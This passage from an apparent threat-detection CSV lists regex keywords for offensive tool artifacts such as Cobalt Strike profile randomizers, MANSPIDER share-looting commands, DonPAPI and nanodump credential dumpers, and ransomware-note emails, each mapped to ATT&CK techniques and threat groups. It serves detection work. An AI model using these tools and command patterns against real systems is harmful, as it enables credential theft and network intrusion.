- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51610"
"*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51611"
"*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51612"
"*malleable-c2-randomizer.py*",".{0,1000}malleable\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","51613"
"*MalleableProfileB64*",".{0,1000}MalleableProfileB64.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","51614"
"*MalleableProfiles.vue*",".{0,1000}MalleableProfiles\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","51615"
"*malleable-redirector-config*",".{0,1000}malleable\-redirector\-config.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51616"
"*mallox.resurrection@onionmail.org*",".{0,1000}mallox\.resurrection\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51617"
"*MalSCCM.exe*",".{0,1000}MalSCCM\.exe.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","51618"
"*MalSCCM-main*",".{0,1000}MalSCCM\-main.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","51619"
"*malware.NewConfig*",".{0,1000}malware\.NewConfig.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","51621"
"*malwaredllc*",".{0,1000}malwaredllc.{0,1000}","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/malwaredllc/byob","1","0","N/A","N/A","N/A","10","9150","2142","2025-03-10T23:35:13Z","2017-12-18T09:10:12Z","51622"
"*malwareurl = ""https:*",".{0,1000}malwareurl\s\=\s\""https\:.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","51623"
"*man_in_the_browser.json*",".{0,1000}man_in_the_browser\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","51624"
"*man_spider.manspider:main*",".{0,1000}man_spider\.manspider\:main.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51625"
"*manage/reflective_dll_inject*",".{0,1000}manage\/reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","51627"
"*ManagedEasyHook.dll*",".{0,1000}ManagedEasyHook\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","51628"
"*manageengine_adselfservice_plus_cve_2022_28810.*",".{0,1000}manageengine_adselfservice_plus_cve_2022_28810\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51630"
"*manageengine_xnode/CVE*",".{0,1000}manageengine_xnode\/CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51631"
"*manager/keepass.py*",".{0,1000}manager\/keepass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51632"
"*manager/mRemoteNG.py*",".{0,1000}manager\/mRemoteNG\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51633"
"*managersmaers@tutanota.com*",".{0,1000}managersmaers\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51634"
"*manasmbellani/brc-1.2.2*",".{0,1000}manasmbellani\/brc\-1\.2\.2.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51635"
"*mandatoryprogrammer/CursedChrome*",".{0,1000}mandatoryprogrammer\/CursedChrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","51636"
"*mandiant/ADFSDump*",".{0,1000}mandiant\/ADFSDump.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","51637"
"*mandiant/ccmpwn*",".{0,1000}mandiant\/ccmpwn.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","51638"
"*mandiant/DueDLLigence*",".{0,1000}mandiant\/DueDLLigence.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","51639"
"*mandiant/gocrack*",".{0,1000}mandiant\/gocrack.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","51640"
"*mandiant/msi-search*",".{0,1000}mandiant\/msi\-search.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","51641"
"*mandiant/SharPersist*",".{0,1000}mandiant\/SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","51642"
"*mandllinject *",".{0,1000}mandllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","51643"
"*manspider * -d * -u * -p *",".{0,1000}manspider\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51644"
"*manspider */24 -f *",".{0,1000}manspider\s.{0,1000}\/24\s\-f\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51645"
"*manspider --threads * -d * -u * -H * --content admin*",".{0,1000}manspider\s\-\-threads\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-\-content\sadmin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51646"
"*manspider*--loot-dir*",".{0,1000}manspider.{0,1000}\-\-loot\-dir.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51647"
"*manspider*--sharenames*",".{0,1000}manspider.{0,1000}\-\-sharenames.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51648"
"*manspider.py*",".{0,1000}manspider\.py.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51649"
"*manspider.spiderling*",".{0,1000}manspider\.spiderling.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51650"
"*manspider_scan*",".{0,1000}manspider_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51651"
"*MANSPIDER-master*",".{0,1000}MANSPIDER\-master.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51652"
"*map_payload_dll*",".{0,1000}map_payload_dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51654"
"*map-get-tls-alternative-names *",".{0,1000}map\-get\-tls\-alternative\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51655"
"*mapper_cve_exploit.py*",".{0,1000}mapper_cve_exploit\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","51656"
"*MARY.SWANN@PROTONMAIL.COM*",".{0,1000}MARY\.SWANN\@PROTONMAIL\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51657"
"*masky_dump*",".{0,1000}masky_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51658"
